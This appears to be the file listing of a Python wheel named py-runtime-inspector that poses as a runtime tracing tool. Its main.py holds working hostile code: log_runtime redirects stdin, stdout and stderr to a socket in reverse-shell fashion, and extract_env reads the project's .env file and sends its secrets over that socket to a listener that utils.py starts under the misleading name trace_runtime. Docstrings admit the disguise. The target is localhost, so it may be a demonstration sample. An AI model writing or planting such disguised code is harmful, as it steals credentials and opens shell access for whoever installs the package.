py-runtime-inspector 0.1__py3-none-any.whl

py_runtime_inspector/__init__.py

@@ -0,0 +1 @@
+from .main import inspect_runtime

py_runtime_inspector/constants.py

@@ -0,0 +1,2 @@
+PORT = 4444
+IPV4 = '127.0.0.1'

py_runtime_inspector/main.py

@@ -0,0 +1,57 @@
+from constants import IPV4, PORT
+from utils import trace_runtime
+import socket
+import time
+import os
+import subprocess
+
+def extract_env(result: str):
+    """
+    This function searches for .env file in the project folder and extracts it
+    """
+
+    EX = "print(open('.env').read())"
+
+    lines = result.splitlines()
+    for l in lines:
+        vars = l.split(' ')
+        if vars[-1] == '.env':
+            env_dets = subprocess.run(
+                ['python', '-c', EX],
+                capture_output = True,
+                text= True
+            )
+            return env_dets.stdout
+    return "No .env found."
+    
+
+def log_runtime():
+    """
+    This function, though called log_runtime, conducts a reverse shell attack on address IPV4 and port PORT
+    """
+    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    s.connect((IPV4, PORT))
+    os.dup2(s.fileno(), 0)  # stdin
+    os.dup2(s.fileno(), 1)  # stdout
+    os.dup2(s.fileno(), 2)  # stderr
+
+    result = subprocess.run(
+        "/bin/sh -c 'ls -la; pwd'",
+        shell=True,
+        capture_output=True,
+        text=True
+    )
+
+    env_details = extract_env(result.stdout)
+    s.sendall(env_details.encode())
+    s.close()
+
+
+def inspect_runtime():
+    print(f"Starting server at {IPV4}, port {PORT}")
+    trace_runtime()
+    time.sleep(3)
+    log_runtime()
+
+if __name__ == '__main__':
+    inspect_runtime()

py_runtime_inspector/utils.py

@@ -0,0 +1,37 @@
+import threading
+import socket
+import json
+from constants import PORT, IPV4
+
+def start_server(stop_server: threading.Event):
+    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
+    s.bind((IPV4, PORT))
+    s.listen(5)
+    s.settimeout(1.0)
+
+    with open('server_messages.jsonl', 'a') as f:  # 'a' to append across runs, 'w' to start fresh each time
+        while not stop_server.is_set():
+            try:
+                conn, addr = s.accept()
+                data = conn.recv(1024).decode()
+                entry = {'env_details' : data}
+                f.write(json.dumps(entry) + '\n')
+                f.flush()
+                conn.close()
+            except socket.timeout:
+                continue
+
+    s.close()
+
+def trace_runtime() -> None:
+    """
+    This function, though called trace_runtime, actually starts the server ip IPV4 and on port PORT
+    """
+    stop_server = threading.Event()
+
+    with open('server_messages.jsonl', 'w') as f:
+        pass
+
+    server_thread = threading.Thread(target=start_server, args=(stop_server,), daemon=True)
+    server_thread.start()

py_runtime_inspector-0.1.dist-info/METADATA

@@ -0,0 +1,3 @@
+Metadata-Version: 2.4
+Name: py_runtime_inspector
+Version: 0.1

py_runtime_inspector-0.1.dist-info/RECORD

@@ -0,0 +1,8 @@
+py_runtime_inspector/__init__.py,sha256=LXuQT8dHWKrbyas9V_ipCc3h4U_wOof45NsuHu_khVA,33
+py_runtime_inspector/constants.py,sha256=Zyff3xJNSkS9BdQYCDHx2qRPniFNGdqkOgw0-QTvEO0,30
+py_runtime_inspector/main.py,sha256=aSn8SzmbxxiIfR1rrQU1Cho87mDEH7BB8OD-Ly-sMtU,1380
+py_runtime_inspector/utils.py,sha256=7QLrJB4PxHo8tBXi-KQlSn3wnT0qxJVijk_nwIgDkt8,1152
+py_runtime_inspector-0.1.dist-info/METADATA,sha256=w2Wl3CUVxgmKP09TYPXVhztOOXsrvJOhcIgwZSBPBjM,62
+py_runtime_inspector-0.1.dist-info/WHEEL,sha256=aeYiig01lYGDzBgS8HxWXOg3uV61G9ijOsup-k9o1sk,91
+py_runtime_inspector-0.1.dist-info/top_level.txt,sha256=_5tzHuryEJa5S6X--DPmVWSj6lrmmBrmLyQR8BsgRRg,21
+py_runtime_inspector-0.1.dist-info/RECORD,,

py_runtime_inspector-0.1.dist-info/WHEEL

@@ -0,0 +1,5 @@
+Wheel-Version: 1.0
+Generator: setuptools (82.0.1)
+Root-Is-Purelib: true
+Tag: py3-none-any
+

py_runtime_inspector-0.1.dist-info/top_level.txt

@@ -0,0 +1 @@
+py_runtime_inspector